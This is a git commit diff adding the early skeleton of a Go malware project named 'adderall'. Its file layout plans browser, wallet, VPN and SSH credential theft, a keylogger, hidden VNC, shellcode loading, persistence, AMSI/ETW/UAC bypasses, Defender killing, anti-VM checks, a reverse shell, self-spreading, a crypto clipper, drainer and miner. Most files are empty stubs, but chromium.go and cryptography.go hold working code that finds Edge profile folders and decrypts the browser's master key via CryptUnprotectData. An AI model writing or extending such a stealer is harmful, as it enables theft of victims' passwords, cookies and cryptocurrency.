Upload of project source code files.

2026-02-17 04:01:29 +01:00
parent 8eee3bb938
commit 38704ce1ad
76 changed files with 257 additions and 0 deletions
--- a/.idea/.gitignore
+++ b/.idea/.gitignore
@@ -0,0 +1,8 @@
+# Default ignored files
+/shelf/
+/workspace.xml
+# Editor-based HTTP Client requests
+/httpRequests/
+# Datasource local storage ignored files
+/dataSources/
+/dataSources.local.xml
--- a/.idea/adderall.iml
+++ b/.idea/adderall.iml
@@ -0,0 +1,9 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="WEB_MODULE" version="4">
+  <component name="Go" enabled="true" />
+  <component name="NewModuleRootManager">
+    <content url="file://$MODULE_DIR$" />
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+  </component>
+</module>
--- a/.idea/discord.xml
+++ b/.idea/discord.xml
@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="DiscordProjectSettings">
+    <option name="show" value="PROJECT_FILES" />
+    <option name="description" value="" />
+  </component>
+</project>
--- a/.idea/modules.xml
+++ b/.idea/modules.xml
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectModuleManager">
+    <modules>
+      <module fileurl="file://$PROJECT_DIR$/.idea/adderall.iml" filepath="$PROJECT_DIR$/.idea/adderall.iml" />
+    </modules>
+  </component>
+</project>
--- a/config.go
+++ b/config.go
@@ -0,0 +1 @@
+package main
--- a/go.mod
+++ b/go.mod
@@ -0,0 +1,3 @@
+module adderall
+
+go 1.22
--- a/listener.go
+++ b/listener.go
@@ -0,0 +1 @@
+package main
--- a/main.go
+++ b/main.go
@@ -0,0 +1,11 @@
+package main
+
+import (
+	"adderall/modules/exfil/browser"
+	"fmt"
+)
+
+func main() {
+	fmt.Println("Hello, World!")
+	browser.Main()
+}
--- a/modules/exfil/browser/browser.go
+++ b/modules/exfil/browser/browser.go
@@ -0,0 +1,5 @@
+package browser
+
+func Main() {
+	chromium()
+}
--- a/modules/exfil/browser/chromium.go
+++ b/modules/exfil/browser/chromium.go
@@ -0,0 +1,47 @@
+package browser
+
+import (
+	"adderall/utils"
+	"fmt"
+	"path/filepath"
+)
+
+func chromium() {
+	fmt.Println("[*] Executing Browser Stealer: Chromium.")
+
+	profiles := []string{"Default", "Profile 1", "Profile 2", "Profile 3", "Profile 4", "Profile 5"}
+	paths := map[string]string{
+		"Microsoft Edge": "Microsoft\\Edge",
+		"name":           "John",
+		"age":            "30",
+	}
+
+	for name, path := range paths {
+		path = filepath.Join(utils.LocalAppData, path, "User Data")
+
+		if utils.FileOrDirExists(path) {
+			fmt.Printf("[*] Main browser dir %s exists.\n", path)
+
+			localState := filepath.Join(path, "Local State")
+
+			if utils.FileOrDirExists(localState) {
+				fmt.Printf("[*] LocalState file %s exists. Retrieving key...\n", localState)
+
+				result := make(chan []byte)
+
+				go getMasterKey(localState, result)
+
+				fmt.Printf("[*] Received key from LocalState file %s: %d.\n", localState, <-result)
+
+				for _, profile := range profiles {
+					path = filepath.Join(path, profile)
+
+					if utils.FileOrDirExists(path) {
+						fmt.Printf("[*] \"%s\" exists. Retrieving Retrieving login data...\n", path)
+						fmt.Println(name)
+					}
+				}
+			}
+		}
+	}
+}
--- a/modules/exfil/browser/cryptography.go
+++ b/modules/exfil/browser/cryptography.go
@@ -0,0 +1,79 @@
+package browser
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"os"
+	"syscall"
+	"unicode/utf8"
+	"unsafe"
+)
+
+var (
+	crypt32                = syscall.NewLazyDLL("crypt32.dll")
+	kernel32               = syscall.NewLazyDLL("kernel32.dll")
+	procCryptUnprotectData = crypt32.NewProc("CryptUnprotectData")
+	procLocalFree          = kernel32.NewProc("LocalFree")
+)
+
+type DataBlob struct {
+	cbData uint32
+	pbData *byte
+}
+
+func getMasterKey(path string, result chan<- []byte) {
+	var encryptedBase64Key struct {
+		OSCrypt struct {
+			EncryptedKey string `json:"encrypted_key"`
+		} `json:"os_crypt"`
+	}
+
+	file, err := os.ReadFile(path)
+	if err != nil {
+		fmt.Printf("[!] Error reading LocalState file %s: %s\n", path, err)
+	}
+
+	if err := json.Unmarshal(file, &encryptedBase64Key); err != nil {
+		fmt.Printf("[!] Error parsing JSON: %s\n", err)
+	}
+
+	encryptedKey, err := base64.StdEncoding.DecodeString(encryptedBase64Key.OSCrypt.EncryptedKey)
+	if err != nil {
+		fmt.Printf("[!] Error decoding base64: %s\n", err)
+	}
+
+	for i := 0; i < 5; i++ {
+		_, size := utf8.DecodeRune(encryptedKey)
+		encryptedKey = encryptedKey[size:]
+	}
+
+	encryptedBlob := DataBlob{
+		cbData: uint32(len(encryptedKey)),
+		pbData: &encryptedKey[0],
+	}
+
+	var outBlob DataBlob
+
+	ret, _, err := procCryptUnprotectData.Call(
+		uintptr(unsafe.Pointer(&encryptedBlob)),
+		0,
+		0,
+		0,
+		0,
+		0,
+		uintptr(unsafe.Pointer(&outBlob)),
+	)
+
+	if ret == 0 {
+		fmt.Println("[!] CryptUnprotectData failed:", err)
+		return
+	}
+
+	decryptedKey := make([]byte, outBlob.cbData)
+	copy(decryptedKey, (*[1 << 20]byte)(unsafe.Pointer(outBlob.pbData))[:outBlob.cbData:outBlob.cbData])
+
+	procLocalFree.Call(uintptr(unsafe.Pointer(outBlob.pbData)))
+
+	result <- decryptedKey
+}
--- a/modules/exfil/browser/gecko.go
+++ b/modules/exfil/browser/gecko.go
@@ -0,0 +1 @@
+package browser
--- a/modules/exfil/file/common.go
+++ b/modules/exfil/file/common.go
@@ -0,0 +1 @@
+package file
--- a/modules/exfil/file/file.go
+++ b/modules/exfil/file/file.go
@@ -0,0 +1 @@
+package file
--- a/modules/exfil/file/important.go
+++ b/modules/exfil/file/important.go
@@ -0,0 +1 @@
+package file
--- a/modules/exfil/game/accounts.go
+++ b/modules/exfil/game/accounts.go
@@ -0,0 +1 @@
+package game
--- a/modules/exfil/game/game.go
+++ b/modules/exfil/game/game.go
@@ -0,0 +1 @@
+package game
--- a/modules/exfil/game/saves.go
+++ b/modules/exfil/game/saves.go
@@ -0,0 +1 @@
+package game
--- a/modules/exfil/mail/mail.go
+++ b/modules/exfil/mail/mail.go
@@ -0,0 +1 @@
+package mail
--- a/modules/exfil/messenger/messenger.go
+++ b/modules/exfil/messenger/messenger.go
@@ -0,0 +1 @@
+package messenger
--- a/modules/exfil/network/adapters.go
+++ b/modules/exfil/network/adapters.go
@@ -0,0 +1 @@
+package network
--- a/modules/exfil/network/monitor.go
+++ b/modules/exfil/network/monitor.go
@@ -0,0 +1 @@
+package network
--- a/modules/exfil/network/network.go
+++ b/modules/exfil/network/network.go
@@ -0,0 +1 @@
+package network
--- a/modules/exfil/network/rdp.go
+++ b/modules/exfil/network/rdp.go
@@ -0,0 +1 @@
+package network
--- a/modules/exfil/network/ssh.go
+++ b/modules/exfil/network/ssh.go
@@ -0,0 +1 @@
+package network
--- a/modules/exfil/system/system.go
+++ b/modules/exfil/system/system.go
@@ -0,0 +1 @@
+package system
--- a/modules/exfil/vpn/vpn.go
+++ b/modules/exfil/vpn/vpn.go
@@ -0,0 +1 @@
+package vpn
--- a/modules/exfil/wallet/seedphrase.go
+++ b/modules/exfil/wallet/seedphrase.go
@@ -0,0 +1 @@
+package wallet
--- a/modules/exfil/wallet/wallet.go
+++ b/modules/exfil/wallet/wallet.go
@@ -0,0 +1 @@
+package wallet
--- a/modules/hvnc/hvnc.go
+++ b/modules/hvnc/hvnc.go
@@ -0,0 +1 @@
+package hvnc
--- a/modules/hvnc/screen.go
+++ b/modules/hvnc/screen.go
@@ -0,0 +1 @@
+package hvnc
--- a/modules/hvnc/transmit.go
+++ b/modules/hvnc/transmit.go
@@ -0,0 +1 @@
+package hvnc
--- a/modules/injections/browser.go
+++ b/modules/injections/browser.go
@@ -0,0 +1 @@
+package injections
--- a/modules/injections/game.go
+++ b/modules/injections/game.go
@@ -0,0 +1 @@
+package injections
--- a/modules/injections/injections.go
+++ b/modules/injections/injections.go
@@ -0,0 +1 @@
+package injections
--- a/modules/injections/mail.go
+++ b/modules/injections/mail.go
@@ -0,0 +1 @@
+package injections
--- a/modules/injections/messenger.go
+++ b/modules/injections/messenger.go
@@ -0,0 +1 @@
+package injections
--- a/modules/injections/vpn.go
+++ b/modules/injections/vpn.go
@@ -0,0 +1 @@
+package injections
--- a/modules/injections/wallet.go
+++ b/modules/injections/wallet.go
@@ -0,0 +1 @@
+package injections
--- a/modules/keylogger/keylogger.go
+++ b/modules/keylogger/keylogger.go
@@ -0,0 +1 @@
+package keylogger
--- a/modules/keylogger/keymaps.go
+++ b/modules/keylogger/keymaps.go
@@ -0,0 +1 @@
+package keylogger
--- a/modules/loader/file.go
+++ b/modules/loader/file.go
@@ -0,0 +1 @@
+package loader
--- a/modules/loader/shellcode.go
+++ b/modules/loader/shellcode.go
@@ -0,0 +1 @@
+package loader
--- a/modules/loader/steganography.go
+++ b/modules/loader/steganography.go
@@ -0,0 +1 @@
+package loader
--- a/modules/modules.go
+++ b/modules/modules.go
@@ -0,0 +1 @@
+package modules
--- a/modules/persistence/file.go
+++ b/modules/persistence/file.go
@@ -0,0 +1 @@
+package persistence
--- a/modules/persistence/persistence.go
+++ b/modules/persistence/persistence.go
@@ -0,0 +1 @@
+package persistence
--- a/modules/persistence/regkey.go
+++ b/modules/persistence/regkey.go
@@ -0,0 +1 @@
+package persistence
--- a/modules/persistence/taskschd.go
+++ b/modules/persistence/taskschd.go
@@ -0,0 +1 @@
+package persistence
--- a/modules/porn_detection/porn_detection.go
+++ b/modules/porn_detection/porn_detection.go
@@ -0,0 +1 @@
+package porn_detection
--- a/modules/privilege_escalation/amsi_bypass.go
+++ b/modules/privilege_escalation/amsi_bypass.go
@@ -0,0 +1 @@
+package privilege_escalation
--- a/modules/privilege_escalation/disable_etw.go
+++ b/modules/privilege_escalation/disable_etw.go
@@ -0,0 +1 @@
+package privilege_escalation
--- a/modules/privilege_escalation/kill_wd.go
+++ b/modules/privilege_escalation/kill_wd.go
@@ -0,0 +1 @@
+package privilege_escalation
--- a/modules/privilege_escalation/uac_bypass.go
+++ b/modules/privilege_escalation/uac_bypass.go
@@ -0,0 +1 @@
+package privilege_escalation
--- a/modules/protection/anti_analysis.go
+++ b/modules/protection/anti_analysis.go
@@ -0,0 +1 @@
+package protection
--- a/modules/protection/anti_debug.go
+++ b/modules/protection/anti_debug.go
@@ -0,0 +1 @@
+package protection
--- a/modules/protection/anti_vm.go
+++ b/modules/protection/anti_vm.go
@@ -0,0 +1 @@
+package protection
--- a/modules/reverse_shell/reverse_shell.go
+++ b/modules/reverse_shell/reverse_shell.go
@@ -0,0 +1 @@
+package reverse_shell
--- a/modules/spread/local_network.go
+++ b/modules/spread/local_network.go
@@ -0,0 +1 @@
+package spread
--- a/modules/spread/mail.go
+++ b/modules/spread/mail.go
@@ -0,0 +1 @@
+package spread
--- a/modules/spread/messenger.go
+++ b/modules/spread/messenger.go
@@ -0,0 +1 @@
+package spread
--- a/modules/spread/spread.go
+++ b/modules/spread/spread.go
@@ -0,0 +1 @@
+package spread
--- a/modules/wallet/clipper.go
+++ b/modules/wallet/clipper.go
@@ -0,0 +1 @@
+package wallet
--- a/modules/wallet/currencies/btc.go
+++ b/modules/wallet/currencies/btc.go
@@ -0,0 +1 @@
+package currencies
--- a/modules/wallet/currencies/eth.go
+++ b/modules/wallet/currencies/eth.go
@@ -0,0 +1 @@
+package currencies
--- a/modules/wallet/currencies/ltc.go
+++ b/modules/wallet/currencies/ltc.go
@@ -0,0 +1 @@
+package currencies
--- a/modules/wallet/currencies/sol.go
+++ b/modules/wallet/currencies/sol.go
@@ -0,0 +1 @@
+package currencies
--- a/modules/wallet/currencies/usdt.go
+++ b/modules/wallet/currencies/usdt.go
@@ -0,0 +1 @@
+package currencies
--- a/modules/wallet/currencies/xmr.go
+++ b/modules/wallet/currencies/xmr.go
@@ -0,0 +1 @@
+package currencies
--- a/modules/wallet/drainer.go
+++ b/modules/wallet/drainer.go
@@ -0,0 +1 @@
+package wallet
--- a/modules/wallet/miner.go
+++ b/modules/wallet/miner.go
@@ -0,0 +1 @@
+package wallet
--- a/sender.go
+++ b/sender.go
@@ -0,0 +1 @@
+package main
--- a/utils/requests.go
+++ b/utils/requests.go
@@ -0,0 +1 @@
+package utils
--- a/utils/sockets.go
+++ b/utils/sockets.go
@@ -0,0 +1 @@
+package utils
--- a/utils/store.go
+++ b/utils/store.go
@@ -0,0 +1 @@
+package utils
--- a/utils/utils.go
+++ b/utils/utils.go
@@ -0,0 +1,14 @@
+package utils
+
+import "os"
+
+var AppData string = os.Getenv("APPDATA")
+var LocalAppData string = os.Getenv("LOCALAPPDATA")
+
+func FileOrDirExists(path string) bool {
+	_, err := os.Stat(path)
+	if os.IsNotExist(err) {
+		return false
+	}
+	return true
+}